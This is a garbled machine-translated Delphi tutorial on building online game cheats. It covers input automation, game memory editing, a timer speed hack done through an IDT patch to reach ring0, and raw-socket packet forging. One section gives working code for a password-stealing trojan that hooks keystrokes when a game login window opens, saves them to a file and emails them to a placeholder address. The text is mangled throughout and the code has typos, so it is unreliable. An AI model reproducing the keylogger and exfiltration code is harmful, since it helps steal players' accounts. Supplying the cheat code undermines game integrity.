Delphi depth journey - online game plug-in production

xiaoxiao2021-03-06 20

In a few years ago, I saw that someone else played online games, and I was really uncomfortable as a programmer. I want to figure out what is going on. I took some to study, I have a personal experience, and I will share it with everyone. It is not more than a few kinds of doors (according to the difficulty of production):

1. Action, so-called action, means that the API sends a command to control the mouse, keyboard, etc., so that the characters in the game will flow or attack, and the earliest "stone" plug-in is this way.

2, local modification, this plug-in has no different game modifiers, doing this plug-in programming only a little understanding of the memory address and master the API can be realized, "Elf" is this It is written in the way that it is difficult to find the address code, and find the address is generally necessary to use the tools of others. Some games have two-code checks, which is being found to be more difficult.

3, Trojan, this plug-in purpose is to help the plug-in producer steal the user's password, do this plug-in has certain difficulties, need hook or keyboard monitoring technology to make a foundation can be completed, its principle is first first The user's account or password is sent to the specified mailbox.

4, acceleration, this plug-in can speed up the speed of the game. Originally I always thought that accelerated pluging was written for a game. Later, I found that this concept is wrong. The so-called acceleration plug is actually the purpose of modifying clock frequencies to acceleration.

5, sealing, this plug-in is difficult plug-in, and it is necessary to have strong programming skills to write. Its principle is to intercept the package, then modify, and forward it. This plug-in is suitable for most online games, such as WPE and some online games are written in this way, writing this plug-in need APIHOOK technology, Winsock2 technology .........

The online game plug-in use with Delphi.

============================================================================================================================================================================================================= ==========================================================================================================================================================

I have made a general summary of the five types of plug-in. Everyone has a certain understanding of these plugs. Now it is shallow to talk about some of the knowledge of the external production ~~~ ~

First of all, let's talk about the plug-in movement, this is the easiest thing I did when I was first written.

I still remember that I was still in the "Stone" era, I saw someone hanging a software (plug-in) person, I could go four outdoors (I didn't know how to hang it outside. ^), So I found this software. Over the study (after taking it, he listened to others said that this is a hanging). It is found that this stuff is actually not difficult, and it is not difficult to see that there is no way to go in different places. There is a impulse to achieve this function, and then take some information on the MSDN, find that these functions, only a few simple API functions can be obtained:

1. First we have to know the location of the mouse (for the location of the current mouse) so we will use the API function getCursorpos, which is as follows: Bool getCursorpos

LPPOINT LPPOINT // Address of Structure for Cursor Position

);

2, we move the position of the mouse to the place where the characters are coming, we will use the setcursorpos function to move the mouse position, its usage is as follows:

Bool setcursorpos

Int x, // horizontal position

INT Y // Vertical Position

);

3, the simulation mouse issues actions and releases, we have to use the mouse_event function to implement, and use the method of use:

Void mouse_event

DWORD dwflags, // flags specifying various motion / click variants

DWORD DX, / / HORIZONTAL MOUSE POSITION OR POSITION CHANGE

DWORD DY, // Vertical Mouse Position Or Position Change

DWORD DWDATA, / / AMOUNT OF WHEEL MOVEMENT

DWORD DWEXTRAINFO / / 32 BITS OF Application-Defined Information

);

At its dwflags, there are many available events such as mobile mouseEventf_move, and press left mouseeventf_leftdown, left mouseeventf_leftup, the specific stuff is still checked MSDN ~~~~~

Ok, I have the previous knowledge, we can take a look at how people move away:

GetCursorpos (Point);

SetCursorpos (Ranpoint (80, Windowx), Ranpoint (80, Windowy)); // Ranpoint is a homemade random coordinate function

Mouse_Event (MouseEventf_leftdown, 0,0,0,0);

Mouse_Event (MouseEventf_leftup, 0,0,0,0);

SetCursorpos (Point.x, Point.y);

I saw the above code. Is it very simple to see the characters? ~~ , Believe it ~~~), then look at the way to attack the game in the game (required to attack the shortcut key), the truth is still the same, just use the API difference ~~~, this back What we need to use is a keybd_event function, which is as follows:

Void keybd_event

Byte Bvk, // Virtual-Key Code

Byte Bscan, // Hardware Scan Code

DWORD dwflags, // flags specifying various function option

DWORD DWEXTRAINFO // Additional Data Associated with Keystroke

);

We must also know that the scan code cannot be used directly. To convert the key value to the scan code with the function mappvirtualkey, the specific usage method of MapVirtualKey is as follows:

UINT MAPVIRTUALKEY

Uint ucode, // virtual-key code or scan code umaptype // translation to perform

);

Ok, it is more than this fast button is Ctrl A, let's take a look at how the actual code is written:

KeyBD_Event (VK_Control, MapVirtualKey (VK_Control, 0), 0, 0);

KeyBD_Event (65, MapVirtualKey (65, 0), 0, 0);

KeyBD_EVENT (65, MapVirtualKey (65, 0), KeyEventf_Keyup, 0);

KeyBD_Event (VK_Control, MapVirtualKey (VK_Control, 0), KeyEventf_Keyup, 0);

First, simulate the CTRL button, then simulate press the A key, then simulate the A key, finally release the CTRL key, which is a cycle that simulates the shortcut.

(Seeing this, almost a certain understanding of the simple exterior ~~~~ Do you try? If you give an imitation, you can have a better Dongdong, this is going to see your comprehension. ~~, but don't be happy too early, this is only starting, and there will be more complex Dongdong waiting for you ~~)

Upon, we have made a resolution of the action, and the action is the simplest plug-in. Now let's take a look, more practical plug-in plug-in - the entire production process of local modified plug-in for detailed decomposition .

I know that the most typical application of local modified plug-in is to play on the "Elf" game, because I am in recent years ("Elf" is still in the test stage), there are many colleagues in my company to play "Elf". So I looked at the data processing method of the game. I found that the information it sent to the server was existing in memory (I got the first feeling: Modifying this game and modifying the stand-alone version of the game. In other words, it was possible to modify the memory address before he submitted information to the server). At that time, I found that the address was changed, and sure, according to my idea, modified the address, so that the system was automatically submitted, it really succeeded. ~~~~~, later "Elf" changed to a double address school inspection, memory school inspection, etc., I will not have nonsense here ~~~~, ok, let's take a look at how this kind of plunks are made of:

We have to have a specific understanding of Windows's memory before doing plug-in, and the memory we refer to it refers to the memory offset of the system, which is relatively memory, and we have to modify it, then we have to Several Windows APIs learn, OK, follow the example to let us see the production of this plug-in production and the application of the API (in order to ensure the normal operation of the online game, I will not explain the way the memory address is detailed):

1. First we have to use FindWindow, know the handle of the game window, because we have to learn the ID of the process after the game is run, below is the usage of FindWindow: hWnd FindWindow

LPCTSTR LPCLASSNAME, / / POINTER TO CLASS NAME

LPCTSTR LPWINDOWNAME / / POINTER TO WINDOW NAME

);

2, we getWindowThreadProcessID to get the process ID of the game window, the function usage is as follows:

DWORD GETWINDOWTHREADPROCESSID

HWND HWND, // Handle of window

LPDWORD LPDWPROCESSID // Address of Variable for Process Identifier

);

3. After getting the game process ID, the next thing is to open the process with the highest permission, and the specific usage of the function OpenProcess used is as follows:

Handle OpenProcess

DWORD DWDESIREDACCESS, // Access Flag

Bool BinheritHandle, // Handle Inheritance Flag

DWORD dwprocessid // process identifier

);

In the dwdesired, you can set an access mode. It can set the permissions, we use as long as you use process_all_access to open the process, and other ways we can check the MSDN.

4, after opening the process, we can use the function to operate, here we use WriteProcessMemory to write data to the memory address (other way of operation, such as: ReadProcessMemory, I am here. Introduced), let's take a look at the usage of WriteProcessMemory:

Bool writeprocessmemory

Handle HProcess, // Handle To Process Whose Memory Is Written To

LPVOID LPBASEADDRESS, / / Address to Start Writing to

LPVOID LPBUFFER, // Pointer to Buffer to Write Data To

DWord nsize, // number of bytes to Write

LPDWORD LPNUMBEROFBYTESWRITTEN / / ACTUAL NUMBER OF BYTES WRITTEN

);

5. The following is done with CloseHandle to close the process handle.

This is a method of implementing some of this type of game, well, there is this method, we have a rational understanding, let's take a look at the actual example, improve our sense of mind, the following is the plug-in XX game Code, we should study it according to the above method:

Const

ResourceOffset: DWORD = $ 004219f4;

Resource: DWORD = 3113226621;

ResourceOffset1: DWORD = $ 004219f8;

Resource1: DWORD = 1940000000;

ResourceOffset2: DWORD = $ 0043fa50;

Resource2: dword = 1280185;

ResourceOffset3: DWORD = $ 0043fa54;

Resource3: dword = 3163064576; resourceoffset4: dword = $ 0043fa58;

Resource4: DWORD = 2298478592;

VAR

HW: hwnd;

PID: DWORD;

H: Thandle;

TT: cardinal;

Begin

HW: = Findwindow ('XX', NIL);

IF hw = 0 THEN

EXIT;

GetWindowThreadProcessId (hw, @PID);

H: = OpenProcess (Process_All_Access, False, PID);

IF h = 0 THEN

EXIT;

if FlatcheckBox1.checked = True Then

Begin

WriteProcessMemory (H, Pointer (Resourceoffset), @resource, sizeof (resource), tt);

WriteProcessMemory (H, Pointer (ResourceOffset1), @ resource1, sizeof (resource1), tt);

END;

If FLATCHECKBOX2.CHECKED = TRUE THEN

Begin

WriteProcessMemory (H, Pointer (ResourceOffset2), @ resource2, sizeof (resource2), tt);

WriteProcessMemory (H, Pointer (ResourceOffset3), @ resource3, sizeof (resource3), tt);

WriteProcessMemory (H, Pointer (ResourceOffset4), @ resource4, sizeof (resource4), tt);

END;

MessageBeep (0);

CloseHandle (H);

CLOSE;

This game has been verified by multi-address for the data to be submitted, so this type of game plug-in production is not very difficult, and the hardest is to find these addresses.

Previously introduced the action, the local modified plug-in is a true plug-in, and today, the Trojan plug-in, which may introduce it, may be like Trojans, it is to help the plug-in person to steal the account and password of others. east. Because there is such an external existence on the network, I have to say today (I personally hate this plug-in, please see this technology, thank you for your cooperation). To do this plug-in program implementation method (such as Hook, Keyboard Monitoring and other technologies), because Hook technology is relatively high for programmers and needs more dynamic link libraries in practical applications, I will take them in the text. Keyboard monitoring technology to achieve this type of Trojan. Keyboard monitoring technology only needs one .exe file to achieve background keyboard monitoring, this program is more suitable for this technology.

We must understand the idea of the program before making a program: 1. Let's first know that you want to record the name of the login window.

2. Judging whether the login window appears.

3. If the login window appears, log the keyboard.

4. When the window is closed, the record information is sent to the programmer's mailbox.

I don't have a specific analysis of the first point, because you have to know what game you play, what is the name of the login window. From the second point, let's start this type of plug-in program implementation:

So how do we judge whether the login window appears? In fact, this is very simple, we can easily implement the FindWindow function:

HWND FINDWINDOW

LPCTSTR LPCLASSNAME, / / POINTER TO CLASS NAME

LPCTSTR LPWINDOWNAME / / POINTER TO WINDOW NAME

);

In the actual program implementation, we have to find the 'XX' window, use FindWindow (NIL, 'XX') if the window has appeared when the return value is greater than 0, then we can record the keyboard information.

First, we use the SETWINDOWSHOKEX to set up the monitoring log, and the usage of this function is as follows:

HHOOK SETWINDOWSHOKEX

Int IDHOOK, // Type of hook to install

HookProc lpfn, // address of hook procedure

Hinstance Hmod, // Handle of Application INSTANCE

DWORD DWTHREADID // Identity of Thread To Install Hook for

);

Here to explain here, in our program, we have to do this to HookProc, we must implement it by writing a function, Hinstance here we can use this program directly, the specific implementation method is:

HHOOK: = SETWINDOWSHOKEX (WH_Journal, Hinstance, 0);

And the functions in hookproc are complex:

Function hookproc (icode: integer; wparam: wparam; lparam: lparam): LRESULT; stdcall;

Begin

if FindedTitle Then // If the window is found

Begin

IF (PEVENTMSG (LPARAM) ^. Message = WM_KEYDOWN) THEN / / message is equal to the keyboard

HookKey: = hookkey form1.keyhookresult (peventmsg (lparam) ^. paraml, peventmsg (lparam) ^. paramh); // passed keyhookResult (custom function, main function is to convert interceptive message parameters as button name. I will Convert message in the end of the article.

if Length> 0 Then // If you get the button name

Begin

Write (hookkeyfile, hookkey); // write the button name to a text file

HookKey: = '';

END;

The above is the entire process of recording the keyboard, simple, if the record is not forgotten, UnHookWindowsHookex (HHOOK), and hHOOK, the handle returned after creating setWindowsHookex.

We have got a record of the keyboard, so now, just send the recorded information back, we have caused it. Other sends this piece is not very difficult, just read the record from the text file, I will send it to the email component comes with Delphi. The code is as follows: assignfile (readfile, 'hook.txt'); // Open hook.txt file file

RESET (READFILE); // Set to read mode

Try

While Not Eof (READFILE) Do // When not read

Begin

Readln (ReadFile, S, J); // Read file line

Body: = body S;

END;

Finally

Closefile (readfile); // Close file

END;

NMSMTP1.EncodeType: = UUMIME; // Setting the encoding

NMSMTP1.POStMessage.attachments.text: = ''; // Set attachment

NMSMTP1.POSTMESSAGE.FROMADDRESS: = 'xxx@xxx.com'; // Set the source mail address

NMSMTP1.POSTMESSAGE.TOADDRESS.TEXT: = 'xxx@xxx.com'; / Set the target email address

NMSMTP1.POSTMESSAGE.BODY.TEXT: = 'Password' '' body; // Set the mail content

NMSMTP1.POSTMESSAGE.SUBJECT: = 'password'; // Setting the message title

NMSMTP1.SENDMAIL; / / Send Mail

I haven't figured out how to make acceleration plug-in, until the second half of the 2001 second half of the 2001 "" Transmission gear "research incorporated" "Transmission gear" student "reassembled, only one I was aware of it, followed by Delphi, I will talk about my experience to everyone, and thank the "Transmission gear" study "author Yan Rui gave a prompt. I will not say nonsense, then began magical accelerated plug-in experience!

Originally I always thought that accelerated pluging was written for a game. Later, I found that this concept is wrong. The so-called acceleration plug is actually the purpose of modifying clock frequencies to acceleration.

In the past DOS era, people played programming immediately thought that this is very simple, it is not to change the 8253 register. This may be able to travel in the previous DOS era, but Windows is not. Windows is a 32-bit operating system, isn't you want to change? (Microsoft's stuff is so domineering, say no change to you, do not change it to you, but do not impossible We can implement two methods: The first is to write a hardware driver to complete, the second is to implement it with RING0 (this method is CIH author Chen Yinghao first, its principle is to modify the IDT table -> Create a interrupt gate -> Enter Ring0-> Call the interrupt modification vector, but there is no way to use ASM assembly to achieve this * _ *, as a high-level language user!), Use the first method to trouble with the first method So we use the second method here to implement it ~~~ Before we realize, let's take a look:

1. We must first write a process to embed the assembly language in this process to achieve the modification of the IDE table, create interrupt gate, modify vector, etc.

2, call this process to achieve acceleration

Ok, now I have a way, let's take a look at the code:

First we build a process, this process is the core part of this program:

Procedure String (Value: Word); stdcall;

Const ZDH = $ 03; // Set an interrupt number

VAR

IDT: Array [0..5] of byte; // Save the IDT table

OG: dword; // Store old vector

Begin

ASM

Push EBX

SIDT IDT // Read Interrupt Descriptive Table

MOV EBX, DWORD PTR [IDT 2] // IDT Subterite

Add EBX, 8 * ZDH // Calculate the location in the interrupt descriptor table

CLI // off interruption

MOV DX, Word PTR [EBX 6]

SHL EDX, 16D

MOV DX, Word PTR [EBX]

MOV [OG], EDX

Mov Eax, Offset @@ Ring0 // Points to Ring0 Grade Code Segment

MOV Word PTR [EBX], AX / / low 16 bits, saved in 1, 2

SHR EAX, 16D

MOV Word PTR [EBX 6], AX // 16-bit, saved at 6, 7

INT ZDH / / interrupt

MOV EBX, DWORD PTR [IDT 2] // Repositioning

Add Ebx, 8 * ZDH

Mov edx, [og]

MOV Word PTR [EBX], DX

SHR EDX, 16D

MOV Word PTR [EBX 6], DX // Restore the changed vector

POP EBX

JMP @@ EXISM / / EXITASM

@@ Ring0: // Ring0, this is also the most core Dongdong

MOV Al, $ 34 // Write 8253 Control Register

OUT $ 43, Al

MOV AX, Value // Write Time Value

OUT $ 40, Al // Write the low value low

Mov Al, AH

OUT $ 40, AL // Write Time Value High IRETD // Return

@@ EXITASM:

END;

The core thing has been finished, and most readers know that they don't know how they do, huh, huh, but I don't know how it happened. Let's try to use this process to do a place similar to the "shifting gear"!

Put a window first, put a TrackBar control on the window to set it to 20, MIN is set to 1, set the position to 10, write in the Change event of this control:

String (Strtoint ('$' INTTOSTR (1742 (10-TRACKBAR1.POSITION) * 160)))

Because the default value of Windows is $ 1742, we use the 1742 as the base, but because the value is, the faster, the thicker is the slower principle, so write such a formula, which is a "shifting gear" a Delphi ASM version (Only for Win9X), huh, try it, this will help you, huh, huh.

In Win2000, we can't achieve it directly, Ring0 is also lost, and some people will think that we can write drivers to complete, but here I tell you, Windows2000 drivers are not a VXD It can be realized, like my low hand does not write the drive WDM used by Windows, there is no way, I only have a good implementation, Prottalk is a good device driver, which is very convenient to achieve low-level ports. Operation, thereby achieving acceleration plugging.

1. Let's first have the next porttalk driver, his official website is http://www.beyondlogic.org

2, we have to copy the protttalk.sys inside.

3, build a protalk.sys interface (I want to omit, everyone can go at http://www.freewebs.com/liuyue/porttalk.pas Next PAS)

4, achieve acceleration plug-in.

Originally, I didn't want to talk about it. I didn't want to talk too much. Let's talk about the implementation of this program. If you use Prottalk to operate the port is much easier, which is easy to operate with RING permission than Win98.

1. Create a new project to copy the interface files and protalk.sys to the folder saved by the project file.

2, we join our interface file in our new project

Uses

Windows, Prottalk ......

3, we build a process

Procedure String (Value: Word);

Begin

IF not openporttalk kiln

Outportb ($ 43, $ 34);

OUTPORTB ($ 40, LO (Value));

OUTPROTB ($ 40, HI (Value);

Closeporttalk;

END;

4, first plus a window, put a TRACKBAR control on the window to set its max to 20, MIN is set to 1, set the position to 10, write on this control:

String (Strtoint ('$' INTTOSTR (1742 (10-TRACKBAR1.POSITION) * 160)))

============================================================================================================================================================================================================= ========================== Online game package technology is one of the concerns of most programming enthusiasts, in this Let us study this question together.

Don't look at this problem, but it is very popular in technology, and there are many ways to achieve (for example, APIHOK, VXD, Winsock2 can be implemented), where we cannot be involved in each technology and method, so I will explain a detailed explanation of Winsock2 technology, even if I have a throwing brick.

Since most readers are not very well understood by the package programming, I will briefly introduce related knowledge here:

APIHOOK:

Since Windows puts the functionality provided by the kernel into the API, everyone must pass the API. In other words, we must capture the data package, you must first know and capture this API, get it from the API Packet information.

Vxd:

Directly achieve the capture of the package information directly by controlling the VXD driver, but VXD can only be used for Win9x.

Winsock2:

Winsock is a Windows network programming interface, Winsock works in the application layer, which provides a high-level data transfer programming interface with the underlying transfer protocol, Winsock2 is the service provider interface provided by Winsock 2.0, but can only be used under Win2000.

Ok, let's start entering WinSock2 blocking programming.

In the package programming, I am ready to be divided into two steps: 1. Capture of the package, 2, the sector of the package.

First we have to achieve the capture of the package:

Delphi's packaged Winsock is 1.0, very natural Winsock2 is not used. If you want to use Winsock2, we have to make an interface to Winsock2 in Delphi, you can use Winsock2.

1. How do I do WINSOCK2 interface?

1) We must first define the type used by Winsock 2.0, where we do a demonstration in the WSA_DATA type, you can give a three-to-use package.

We must know that the WSA_Data type will be used for WSAStartup (WSData: TWSADATA): Integer;, you will find that WSDATA is a reference parameter. In the incoming parameter, the number of variables is the address of the variable, so we do the following for WSA_DATA. Package:

Const

WSADESCRIPTION_LEN = 256;

WSASYS_STATUS_LEN = 128;

Type

PWSA_DATA = ^ TWSA_DATA;

WSA_DATA = Record

WVERSION: WORD;

WORHVERSION: WORD;

Szdescription: array [0..wsadescription_len] of char;

SzsystemStatus: array [0..wsasys_status_len] of char; iMaxSockets: Word;

IMAXUDPDG: WORD;

LPVENDORINFO: PCHAR;

END;

TWSA_DATA = WSA_DATA;

2) We have to introduce Winsock2 functions from WS2_32.dll, where we also do function with WSAStartup as an example:

Function WSAStartup (WVersionRequired: Word; Var WSData: TWSADATA): Integer; stdcall;

IMPLEMENTATION

Const winsocket2 = 'ws2_32.dll';

Function WSAStartup; External Winsocket Name 'WSAStartup';

Through the above methods, we can interface to Winsock2. Let's use Winsock2 to make a package capture, but you must have a network card. Because it involves the problem of online game security issues, we are here for packet capture with IP packets. If you are not very clear, please check MSDN:

1) We want to start WSA, at this time, the WSAStartup function to use, the usage is as follows:

Integer WSAStartup

WVERSIONREQUIRED: WORD,

WSDATA: TWSA_DATA

);

2) Use the socket function to get the Socket handle, m_hsocket: = socket (AF_INET, SOCK_RAW, IPPROTO_IP); Usage is as follows:

Integer Socket (AF: Integer,

Struct: Integer,

Protocol: integer

);

m_hsocket: = Socket (AF_INET, SOCK_RAW, IPPROTO_IP); M_HSocket is the Socket handle, AF_INET, SOCK_RAW, and IPPROTO_IP are constants.

3) Define the SOCK_ADDR type, follow our network card IP to the SOCK_ADDR type, then we use the bind function to bind our network card, the Bind function is as follows:

Type

IN_ADDR = Record

S_addr: pchar;

END;

Type

TSOCK_ADDR = Record

SIN_FAMILY: WORD;

SIN_PORT: WORD;

SIN_ADDR: IN_ADDR

SIN_ZERO: ARRAY [0..7] of char;

END;

VAR

Localaddr: Tsock_addr;

Localaddr.sin_family: = af_INet;

Localaddr.sin_Port: = 0;

Localaddr.sin_addr.s_addr: = inet_addr ('192.168.1.1'); // Here your own network card IP address, and inet_addr this function is the function of Winsock2.

Bind (M_HSocket, Localaddr, Sizeof (Localaddr));

4) Use WSAIOCTL to register the WSA input and output components, which are as follows:

Integer WSAIOCTL (S: INTEGER,

DWIOCONTROLCODE: INTEGER,

LPVINBUFFER: INTEGER, CBINBUFFER: INTEGER,

LPVOUTBUFFER: INTEGER,

CBoutBuffer: Integer,

LPCBBYTESRETURNED: INTEGER,

LPOVERLAPPED: INTEGER,

LPCompletionRoutine: Integer

);

5) The following is died, in the dead circulation block, to achieve the reception of data. However, the middle of the ring should be delayed in Sleep (), otherwise the program will be wrong.

6) In the cycle block, use the RECV function to receive data, the RECV function is as follows:

Integer Recv (S: Integer,

Buffer: array [0..4095] of byte,

Length: integer,

Flags: integer,

);

7) In Buffer is the data we receive, if we want to know where the data is sent, then we want to define a certain IP package structure, use copymemory () to read the IP information from the buffer. However, it is necessary to read the sixteen-based data to be converted.

I looked at the package captured, it was a little start, but I have to tell you that the package is very easy, but many game packages are encrypted, if you want to figure out What is what you need to packet decryption.

In this chapter, we mainly study the production and sending of the package, and the same method we use is Delphi Winsock2 to make. I have said that only Winsock1 in Delphi, Winsock2 needs to be packaged, and I will not introduce how to encapsulate it.

Let's take a step in our packaging package and send it.

First of all, we should know that the package is divided into two sections. One is IP, one is the agreement (TCP, UDP, other protocols), IP is like a postal code, I lognow your package, where is it, and the agreement? In the format and verification of the package to be used, the agreement in online games is generally defined. To crack the most important thing about the online game is to learn to crack the online game agreement online game agreement, in order not Impact the security of online games that is running, I will introduce the entire process of the package and sending of the network protocol in this regard as an example of the UDP protocol.

Next, we can start to see the whole process of the entire package:

1) We want to start SOCK2, at this time, the WSAStartup function to use, the usage is as follows:

Integer WSAStartup

WVERSIONREQUIRED: WORD,

WSDATA: TWSA_DATA

);

WVersionRequired We are in the program $ 0002, WSData is the structure of TWSA_DATA. 2) Use the socket function to create and get the Socket handle; the usage is as follows:

Integer Socket (AF: Integer,

Struct: Integer,

Protocol: integer

);

Note that in our block package, we have an IP header, so our struct parameter is here to pass, and the parameter value is 2, indicating that the header is included. This function returns the value of the Winsocket just created.

3) Use the SetsockOpt function to set the SOCK option; the usage is as follows:

Integer setsockopt (s: integer,

Level: Integer,

Optname: Integer,

Optval: pchar,

Optlen: Integer

);

The Socket handle is incorporated in s, and the value of the Level input in this program is 0 indicates IP (if it is 6 indicates TCP, 17 means UDP, etc.), and the OptName is written into 2, while the initial value of OptVal fills in 1 Optlen as the size of OptVal.

4) Next, we have to divide several steps to implement build packages:

1. Convert the IP to the SOCK address and convert it with inet_addr.

Longint INET_ADDR

CP: pchar

);

2, the total size of the definition package, the version of IP is IP structure:

The total package size = IP header UDP header size UDP message size,

IP version, defined in this program is 4,

3, fill in the structure of the IP header:

Ip.Ipverlen: = IP version SHL 4;

ip.iptos: = 0; // IP service type

IP.IPTOTIONENGTH: =; // Size

IP.IPID: = 0; // Unique identifier, generally set to 0

ip.Ipoffset: = 0; // Offset field

IP.IPTTL: = 128; // Timeout

ip.ipprotocol: = $ 11; // Define protocol

ip.ipChecksum: = 0; // Total number of inspection

ip.ipsrcaddr: =; // source address

ip.IpdestAddr: =; // destination address

4, fill in the structure of the UDP Baotou:

udp.srcportno: =; // Source port number

UDP.DSTPORTNO: =; // Target port number

Udp.udplength: =; // UDP package size

UDP.UDPCHECKSUM: =; // Total number of inspection

5, put the IP header, UDP header and message, put into the cache.

6, define remote information:

Remote.family: = 2;

Remote.port: =; // Remote port

Remote.addr.addr: =; // Remote address

5) We use Sendto to send a package, usage as follows:

Integer Sendto (S: Integer,

VAR BUF: Integer,

Var Len: integer,

Var flags: integer,

VAR AddRTO: TSOCK_ADDR;

TOLEN: Integer

);

In Socket handle, BUF is a packet that is just built. The total length of the Len passed into the package has just been calculated. Here we have access to Remote, and Tolen is written in the size of the Remote. 6) In the end, don't forget to use CloseSocket (SH) to close Socket and use WSacleanup to shut down Winsock.

The last thing to say is that this transmission method can only send a fully crafted network protocol. If you want to send data in the middle of someone else's program, you can only use APIHOOK or do an intermediate layer in Winsock2.

转载请注明原文地址:https://www.9cbs.com/read-43680.html

9cbs

New Post(0)